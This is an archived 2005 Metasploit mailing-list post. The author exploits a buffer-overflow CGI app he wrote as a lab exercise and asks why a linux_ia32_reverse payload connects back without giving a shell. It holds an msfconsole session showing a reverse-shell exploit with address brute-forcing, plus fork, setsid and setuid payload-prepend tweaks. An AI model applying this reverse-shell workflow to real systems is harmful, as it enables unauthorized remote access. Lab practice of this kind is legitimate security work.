Metasploit mailing list archives
Can't seem to get a shell prompt from linux_ia32_reverse
From: jwasser at skaion.com (John Wasser)
Date: Tue, 05 Apr 2005 16:46:25 -0400
As an exercise I created a CGI application (Apache under Fedora Core 3 Linux) with a buffer overflow vulnerability and a Metasploit exploit for it. The exploit works and the payload executes but when I use the linux_ia32_reverse payload I don't get a shell prompt. The Reverse Handler gets the connection but no prompt: ------------------------------------------------------------ [root at xxxxx framework-2.3]# ./msfconsole + -- --=[ msfconsole v2.3 [59 exploits - 69 payloads] msf > use SkaionRegForm msf SkaionRegForm > set PAYLOAD linux_ia32_reverse PAYLOAD -> linux_ia32_reverse msf SkaionRegForm(linux_ia32_reverse) > set LHOST localhost LHOST -> localhost msf SkaionRegForm(linux_ia32_reverse) > exploit [*] Starting Reverse Handler. [*] Trying exploit target Fedora Core 3 Bruteforce [*] RawPayload Length=70, EncodedPayload length=94, Nops=162, fullPayload Length=256 [*] Brute forcing bffff280 => bffff380 (step 161)... [*] Trying bffff280... [*] Trying bffff321... [*] Got connection from 127.0.0.1:4321 <-> 127.0.0.1:35609 [*] Exiting Reverse Handler. msf SkaionRegForm(linux_ia32_reverse) > -------------------------------------------------------------- The time between "Got connection" and "Exiting Reverse Handler" is roughly a second. I tried various code in PayloadPrepend() including binary for: if (fork()) exit(0); if (!fork()){if(fork())exit(0);}else exit(0); // Double Fork setsid(); setgid(0);setuid(0); and various combinations thereof... In all cases I still got the reverse connection indicating that the payload code was executing but in no case did I ever get a shell prompt. Any suggestions? Apache: 2.0.52 OS: Fedora Core 3 /proc/sys/kernel/exec-shield = 0 /proc/sys/kernel/exec-shield-randomize = 0
Current thread:
- Can't seem to get a shell prompt from linux_ia32_reverse John Wasser (Apr 05)
- <Possible follow-ups>
- Can't seem to get a shell prompt from linux_ia32_reverse mmiller at hick.org (Apr 05)
- Can't seem to get a shell prompt from linux_ia32_reverse John Wasser (Apr 06)